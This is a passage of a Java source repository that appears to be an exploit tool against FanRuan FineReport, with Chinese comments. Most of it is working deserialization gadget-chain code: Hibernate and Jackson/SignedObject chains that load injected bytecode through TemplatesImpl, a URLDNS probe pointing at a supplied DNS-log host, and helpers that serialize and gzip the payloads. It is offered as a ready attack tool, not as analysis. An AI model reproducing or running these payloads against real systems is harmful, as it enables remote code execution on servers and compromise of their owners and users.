PojoComponentTuplizer 实例,用来触发 Getter 方法 AbstractComponentTuplizer tuplizer = (AbstractComponentTuplizer) utils.createInstanceUnsafely(pojoComponentTuplizerClass); // 反射将 BasicGetter 写入 PojoComponentTuplizer 的成员变量 getters 里 Field field = abstractComponentTuplizerClass.getDeclaredField("getters"); field.setAccessible(true); field.set(tuplizer, getters); // 创建 ComponentType 实例,用来触发 PojoComponentTuplizer 的 getPropertyValues 方法 Object type = utils.createInstanceUnsafely(componentTypeClass); // 反射将相关值写入,满足 ComponentType 的 getHashCode 调用所需条件 utils.setFieldValue(type,"componentTuplizer",tuplizer); utils.setFieldValue(type,"propertySpan",1); utils.setFieldValue(type,"propertyTypes",new Type[]{(Type) type}); // 创建 TypedValue 实例,用来触发 ComponentType 的 getHashCode 方法 TypedValue typedValue = new TypedValue((Type) type, null); // 创建反序列化用 HashMap HashMap hashMap = new HashMap<>(); hashMap.put(typedValue, "123"); // put 到 hashmap 之后再反射写入,防止 put 时触发 utils.setFieldValue(typedValue,"value", tmpl); byte[] ser = utils.serialize(hashMap); // utils.unserialize(ser); byte[] payload = utils.GzipCompress(ser); return payload; } } ================================================ FILE: src/main/java/com/example/frchannel/payload/JacksonSignedObject.java ================================================ package com.example.frchannel.payload; import com.fr.third.fasterxml.jackson.databind.node.POJONode; import com.fr.third.springframework.aop.target.HotSwappableTargetSource; import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xpath.internal.objects.XString; import javassist.ClassPool; import javassist.CtClass; import javassist.CtMethod; import javax.management.BadAttributeValueExpException; import java.lang.reflect.Array; import java.lang.reflect.Constructor; import java.security.SignedObject; import java.util.HashMap; public class JacksonSignedObject { public static byte[] getPayload(byte[] bytes) throws Exception { TemplatesImpl t = utils.getTeml(bytes); try { CtClass ctClass = ClassPool.getDefault().get("com.fr.third.fasterxml.jackson.databind.node.BaseJsonNode"); CtMethod writeReplace = ctClass.getDeclaredMethod("writeReplace"); ctClass.removeMethod(writeReplace); // 将修改后的CtClass加载至当前线程的上下文类加载器中 ctClass.toClass(); } catch (Exception e){ } POJONode node = new POJONode(utils.makeTemplatesImplAopProxy(t)); BadAttributeValueExpException val = new BadAttributeValueExpException(null); utils.setFieldValue(val,"val",node); SignedObject s = utils.makeSignedObject(val); POJONode node2 = new POJONode(s); HotSwappableTargetSource h1 = new HotSwappableTargetSource(node2); HotSwappableTargetSource h2 = new HotSwappableTargetSource(new XString("xxx")); HashMap hashmap = new HashMap<>(); utils.setFieldValue(hashmap, "size", 2); Class nodeC; try { nodeC = Class.forName("java.util.HashMap$Node"); } catch ( ClassNotFoundException e ) { nodeC = Class.forName("java.util.HashMap$Entry"); } Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC); nodeCons.setAccessible(true); Object tbl = Array.newInstance(nodeC, 2); Array.set(tbl, 0, nodeCons.newInstance(0, h1, h1, null)); Array.set(tbl, 1, nodeCons.newInstance(0, h2, h2, null)); utils.setFieldValue(hashmap, "table", tbl); byte[] ser = utils.serialize(hashmap); byte[] payload = utils.GzipCompress(ser); return payload; } } ================================================ FILE: src/main/java/com/example/frchannel/payload/URLDNS.java ================================================ package com.example.frchannel.payload; import java.net.URL; import java.util.HashMap; public class URLDNS { public static byte[] getPayload(String dnslog) { try { HashMap map = new HashMap(); URL url = new URL("http://"+dnslog); utils.setFieldValue(url,"hashCode",123123); map.put(url,123); utils.setFieldValue(url,"hashCode",-1); byte[] ser = utils.serialize(map); byte[] payload = utils.GzipCompress(ser); return payload; } catch (Exception e){ } return null; } } ================================================ FILE: src/main/java/com/example/frchannel/payload/utils.java ================================================ package com.example.frchannel.payload; import com.fr.third.springframework.aop.framework.AdvisedSupport; import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; import sun.misc.Unsafe; import javax.xml.transform.Templates; import java.io.*; import java.lang.reflect.Constructor; import java.lang.reflect.Field; import java.lang.reflect.InvocationHandler; import java.lang.reflect.Proxy; import java.math.BigInteger; import java.security.*; import java.security.interfaces.DSAParams; import java.security.interfaces.DSAPrivateKey; import java.util.zip.GZIPInputStream; import java.util.zip.GZIPOutputStream; public class utils { public static TemplatesImpl getTeml(byte[] bytes) throws Exception { TemplatesImpl templates = TemplatesImpl.class.newInstance(); setFieldValue(templates,"_name","moresec"+System.nanoTime()); setFieldValue(templates,"_class",null); setFieldValue(templates,"_tfactory",new TransformerFactoryImpl()); setFieldValue(templates,"_bytecodes",new byte[][]{bytes}); return templates; } public static void setFieldValue(Object o, String fieldName, Object value) throws Exception { Field field = o.getClass().getDeclaredField(fieldName); field.setAccessible(true); field.set(o,value); } public static Object getFieldValue(Object o, String fieldName) throws Exception { Field field = o.getClass().getDeclaredField(fieldName); field.setAccessible(true); return field.get(o); } public static Constructor getConstructor(String name) throws Exception { Constructor ctor = Class.forName(name).getDeclaredConstructor(); ctor.setAccessible(true); return ctor; } public static byte[] getClassByteCode(String classname) { String jarname = "/" + classname.replace('.', '/') + ".class"; InputStream is = utils.class.getResourceAsStream(jarname); ByteArrayOutputStream bytestream = new ByteArrayOutputStream(); int ch; byte imgdata[] = null; try { while ((ch = is.read()) != -1) { bytestream.write(ch); } imgdata = bytestream.toByteArray(); } catch (IOException e) { e.printStackTrace(); } finally { try { bytestream.close(); } catch (IOException e) { e.printStackTrace(); } } return imgdata; } public static SignedObject makeSignedObject(Object o) throws IOException, InvalidKeyException, SignatureException { return new SignedObject((Serializable) o, new DSAPrivateKey() { @Override public DSAParams getParams() { return null; } @Override public String getAlgorithm() { return null; } @Override public String getFormat() { return null; } @Override public byte[] getEncoded() { return new byte[0]; } @Override public BigInteger getX() { return null; } }, new Signature("x") { @Override protected void engineInitVerify(PublicKey publicKey) throws InvalidKeyException { } @Override protected void engineInitSign(PrivateKey privateKey) throws InvalidKeyException { } @Override protected void engineUpdate(byte b) throws SignatureException { } @Override protected void engineUpdate(byte[] b, int off, int len) throws SignatureException { } @Override protected byte[] engineSign() throws SignatureException { return new byte[0]; } @Override protected boolean engineVerify(byte[] sigBytes) throws SignatureException { return false; } @Override protected void engineSetParameter(String param, Object value) throws InvalidParameterException { } @Override protected Object engineGetParameter(String param) throws InvalidParameterException { return null; } }); } public static byte[] serialize(Object o) throws IOException { ByteArrayOutputStream bao = new ByteArrayOutputStream(); ObjectOutputStream oos = new ObjectOutputStream(bao); oos.writeObject(o); return bao.toByteArray(); } public static void unserialize(byte[] b) throws IOException, ClassNotFoundException { ByteArrayInputStream bis = new ByteArrayInputStream(b); ObjectInputStream ois = new ObjectInputStream(bis); ois.readObject(); } public static byte[] hexToByte(String hex){ int m = 0, n = 0; int byteLen = hex.length() / 2; // 每两个字符描述一个字节 byte[] ret = new byte[byteLen]; for (int i = 0; i < byteLen; i++) { m = i * 2 + 1; n = m + 1; int intVal = Integer.decode("0x" + hex.substring(i * 2, m) + hex.substring(m, n)); ret[i] = Byte.valueOf((byte)intVal); } return ret; } public static byte[] GzipCompress(byte[] out) throws Exception{ ByteArrayOutputStream out2 = new ByteArrayOutputStream(); GZIPOutputStream gzip; gzip = new GZIPOutputStream(out2); gzip.write(out); gzip.close(); return out2.toByteArray(); } public static byte[] GzipUncompress(byte[] bytes) { if (bytes == null || bytes.length == 0) { return null; } ByteArrayOutputStream out = new ByteArrayOutputStream(); ByteArrayInputStream in = new ByteArrayInputStream(bytes); try { GZIPInputStream ungzip = new GZIPInputStream(in); byte[] buffer = new byte[256]; int n; while ((n = ungzip.read(buffer)) >= 0) { out.write(buffer, 0, n); } } catch (IOException e) { // ApiLogger.error("gzip uncompress error.", e); } return out.toByteArray(); } // 使用 Unsafe 来绕过构造方法创建类实例 public static Object createInstanceUnsafely(Class clazz) throws Exception { // 反射获取Unsafe的theUnsafe成员变量 Field theUnsafeField = Unsafe.class.getDeclaredField("theUnsafe"); theUnsafeField.setAccessible(true); Unsafe unsafe = (Unsafe) theUnsafeField.get(null); return unsafe.allocateInstance(clazz); } public static Object makeTemplatesImplAopProxy(Object o) throws Exception { AdvisedSupport advisedSupport = new AdvisedSupport(); advisedSupport.setTarget(o); Constructor constructor = Class.forName("com.fr.third.springframework.aop.framework.JdkDynamicAopProxy").getConstructor(AdvisedSupport.class); constructor.setAccessible(true); InvocationHandler handler = (InvocationHandler) constructor.newInstance(advisedSupport); Object proxy = Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(), new Class[]{Templates.class}, handler); return proxy; } } ================================================ FILE: src/main/resources/META-INF/MANIFEST.MF ================================================ Manifest-Version: 1.0 Main-Class: com.example.frchannel.MainApplication ================================================ FILE: src/main/resources/com/example/frchannel/main.fxml ================================================